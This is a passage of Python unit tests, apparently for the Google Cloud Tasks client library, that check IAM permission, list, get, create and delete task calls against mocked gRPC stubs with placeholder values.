assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
@pytest.mark.asyncio
async def test_test_iam_permissions_async_from_dict():
await test_test_iam_permissions_async(request_type=dict)
def test_test_iam_permissions_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_test_iam_permissions_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_test_iam_permissions_from_dict_foreign():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
response = client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
def test_test_iam_permissions_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
arg = args[0].permissions
mock_val = ["permissions_value"]
assert arg == mock_val
def test_test_iam_permissions_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.test_iam_permissions(
iam_policy_pb2.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            iam_policy_pb2.TestIamPermissionsResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
arg = args[0].permissions
mock_val = ["permissions_value"]
assert arg == mock_val
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.test_iam_permissions(
iam_policy_pb2.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
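# Illustrative sketch, not generator output: as in the *_from_dict_foreign tests above, a
# plain dict may be passed as the request; the client coerces it into the protobuf request
# type before invoking the transport. The field assertions below rest on that coercion
# assumption, and the test name is hypothetical.
def test_example_test_iam_permissions_dict_request_coercion():
    client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
    with mock.patch.object(
        type(client.transport.test_iam_permissions), "__call__"
    ) as call:
        call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
        client.test_iam_permissions(
            request={
                "resource": "resource_value",
                "permissions": ["permissions_value"],
            }
        )
    _, args, _ = call.mock_calls[0]
    assert args[0].resource == "resource_value"
    assert list(args[0].permissions) == ["permissions_value"]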
@pytest.mark.parametrize("request_type", [cloudtasks.ListTasksRequest, dict,])
def test_list_tasks(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse(
next_page_token="next_page_token_value",
)
response = client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksPager)
assert response.next_page_token == "next_page_token_value"
def test_list_tasks_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
client.list_tasks()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
@pytest.mark.asyncio
async def test_list_tasks_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.ListTasksRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse(next_page_token="next_page_token_value",)
)
response = await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_tasks_async_from_dict():
await test_list_tasks_async(request_type=dict)
def test_list_tasks_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
call.return_value = cloudtasks.ListTasksResponse()
client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_tasks_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse()
)
await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_tasks_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_tasks_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_tasks_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            cloudtasks.ListTasksResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_tasks_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
def test_list_tasks_pager(transport_name: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
        metadata = (
            gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
        )
pager = client.list_tasks(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, task.Task) for i in results)
def test_list_tasks_pages(transport_name: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = list(client.list_tasks(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_tasks_async_pager():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_tasks), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
async_pager = await client.list_tasks(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, task.Task) for i in responses)
@pytest.mark.asyncio
async def test_list_tasks_async_pages():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_tasks), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_tasks(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
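# Illustrative sketch, not generator output: the pager returned by list_tasks can be walked
# page by page as well as item by item. This helper flattens mocked pages into one list,
# reusing the side_effect style from the pager tests above; the helper and test names are
# hypothetical.
def _example_collect_tasks(pager):
    collected = []
    for page in pager.pages:
        # Each page exposes the underlying ListTasksResponse via raw_page.
        collected.extend(page.raw_page.tasks)
    return collected
def test_example_collect_tasks_from_pager():
    client = CloudTasksClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )
    with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
        call.side_effect = (
            cloudtasks.ListTasksResponse(
                tasks=[task.Task(), task.Task()], next_page_token="abc",
            ),
            cloudtasks.ListTasksResponse(tasks=[task.Task()]),
        )
        results = _example_collect_tasks(client.list_tasks(request={}))
    assert len(results) == 3
    assert all(isinstance(t, task.Task) for t in results)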
@pytest.mark.parametrize("request_type", [cloudtasks.GetTaskRequest, dict,])
def test_get_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
def test_get_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
client.get_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
@pytest.mark.asyncio
async def test_get_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.GetTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(name="name_value", view=task.Task.View.BASIC,)
)
response = await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.view == task.Task.View.BASIC
@pytest.mark.asyncio
async def test_get_task_async_from_dict():
await test_get_task_async(request_type=dict)
def test_get_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
call.return_value = task.Task()
client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
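# Illustrative sketch, not generator output: the async tests above wrap the designated
# return value in grpc_helpers_async.FakeUnaryUnaryCall so that awaiting the client
# coroutine yields the message itself. The test name is hypothetical.
@pytest.mark.asyncio
async def test_example_async_fake_unary_unary_call():
    client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    with mock.patch.object(type(client.transport.get_task), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            task.Task(name="name_value",)
        )
        response = await client.get_task(name="name_value",)
    assert isinstance(response, task.Task)
    assert response.name == "name_value"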
@pytest.mark.parametrize("request_type", [cloudtasks.CreateTaskRequest, dict,])
def test_create_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task(
name="name_value",
view=gct_task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.view == gct_task.Task.View.BASIC
def test_create_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
client.create_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
@pytest.mark.asyncio
async def test_create_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.CreateTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_task.Task(name="name_value", view=gct_task.Task.View.BASIC,)
)
response = await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.view == gct_task.Task.View.BASIC
@pytest.mark.asyncio
async def test_create_task_async_from_dict():
await test_create_task_async(request_type=dict)
def test_create_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
call.return_value = gct_task.Task()
client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_task_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].task
mock_val = gct_task.Task(name="name_value")
assert arg == mock_val
def test_create_task_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_task_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].task
mock_val = gct_task.Task(name="name_value")
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
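# Illustrative sketch, not generator output: the flattened task= argument is copied onto
# CreateTaskRequest.task as-is, including nested messages such as the AppEngineHttpRequest
# already used in this file. The test name is hypothetical.
def test_example_create_task_nested_message_passthrough():
    client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
    task_arg = gct_task.Task(
        name="name_value",
        app_engine_http_request=target.AppEngineHttpRequest(
            http_method=target.HttpMethod.POST
        ),
    )
    with mock.patch.object(type(client.transport.create_task), "__call__") as call:
        call.return_value = gct_task.Task()
        client.create_task(parent="parent_value", task=task_arg)
    _, args, _ = call.mock_calls[0]
    assert args[0].task == task_arg
    assert args[0].task.app_engine_http_request.http_method == target.HttpMethod.POST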
@pytest.mark.parametrize("request_type", [cloudtasks.DeleteTaskRequest, dict,])
def test_delete_task(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_task_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
client.delete_task()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
@pytest.mark.asyncio
async def test_delete_task_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.DeleteTaskRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_task_async_from_dict():
await test_delete_task_async(request_type=dict)
def test_delete_task_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_task), "__call__") as call:
call.return_value = None
client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
